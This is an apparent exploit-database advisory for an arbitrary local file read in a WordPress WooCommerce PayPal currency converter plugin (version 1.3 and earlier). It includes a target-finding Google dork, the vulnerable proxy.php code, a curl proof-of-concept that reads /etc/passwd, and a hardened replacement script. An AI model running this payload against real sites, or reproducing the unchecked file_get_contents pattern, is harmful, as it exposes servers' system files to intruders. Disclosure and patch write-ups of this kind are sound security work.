Title: WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
Description:
proxy.php's code:
<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately it is not included), so any HTML file can be loaded, and an attacker may be able to read any local file that is not executed by the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
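A hardened form of the proxy.php shown in the description, as an added example that is not the plugin's or the advisory author's code: it accepts `requrl` only when it is an https URL on one expected host, so bare paths such as /etc/passwd and other stream wrappers are refused before `file_get_contents()` runs. The host `converter.example.com` is a placeholder (the page does not say which service the plugin queries), and the helper names `is_allowed_requrl` and `extract_result` are hypothetical.

```php
<?php
// Added example: hardened variant of proxy.php, not the plugin's own code.
// ALLOWED_HOST is a placeholder; the advisory does not name the real upstream service.
const ALLOWED_HOST = 'converter.example.com';

// Accept only https URLs that point at the single expected host.
function is_allowed_requrl($url): bool
{
    if (!is_string($url) || $url === '') {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false; // bare paths such as /etc/passwd have no scheme or host
    }
    if (strtolower($parts['scheme']) !== 'https') {
        return false; // refuses file://, php://, data://, ftp:// and plain http://
    }
    if (isset($parts['user']) || isset($parts['pass']) || isset($parts['port'])) {
        return false; // no embedded credentials or alternative ports
    }
    return strtolower($parts['host']) === ALLOWED_HOST;
}

// Return only the fragment between the two markers the original code searches for.
function extract_result(string $html): string
{
    $start = strpos($html, '<div id=currency_converter_result>');
    $end   = strpos($html, '<input type=hidden name=meta');
    if ($start === false || $end === false || $end <= $start) {
        return ''; // markers missing: print nothing instead of an arbitrary slice
    }
    return substr($html, $start, $end - $start);
}

$requrl = $_GET['requrl'] ?? null;
if (!is_allowed_requrl($requrl)) {
    http_response_code(400);
    exit('Invalid request');
}
// Disable redirects so the allowed host cannot bounce the fetch to another target.
$ctx  = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 5]]);
$html = @file_get_contents($requrl, false, $ctx);
echo $html === false ? '' : extract_result($html);
```

With this check in place, the request from the Example above returns HTTP 400 because `/etc/passwd` parses without a scheme or host.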